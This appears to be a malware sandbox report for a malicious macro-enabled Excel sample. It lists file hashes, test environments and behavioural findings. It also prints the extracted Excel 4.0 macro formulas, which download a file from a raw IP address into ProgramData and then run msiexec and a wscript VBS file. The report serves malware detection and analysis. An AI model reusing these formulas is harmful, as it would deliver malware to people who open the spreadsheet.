General
Target
f9c430c306834c158889f954dee30533_JaffaCakes118
Size
6KB
Sample
240419-hv1xqscd4y
MD5
f9c430c306834c158889f954dee30533
SHA1
036901f031a0085cf830b5fe180702a1c1c3529b
SHA256
46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82
SHA512
82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8
SSDEEP
192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY
Static task
static1
Behavioral task
behavioral1
Sample
f9c430c306834c158889f954dee30533_JaffaCakes118.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f9c430c306834c158889f954dee30533_JaffaCakes118.xlsm
Resource
win10v2004-20240412-en
Malware Config
Extracted
http://46.17.98.187
formulas
=EXEC("msiexec.exe")
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
=EXEC("wscript C:\ProgramData\start.vbs")
=HALT()
Targets
Target
f9c430c306834c158889f954dee30533_JaffaCakes118
Score
10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.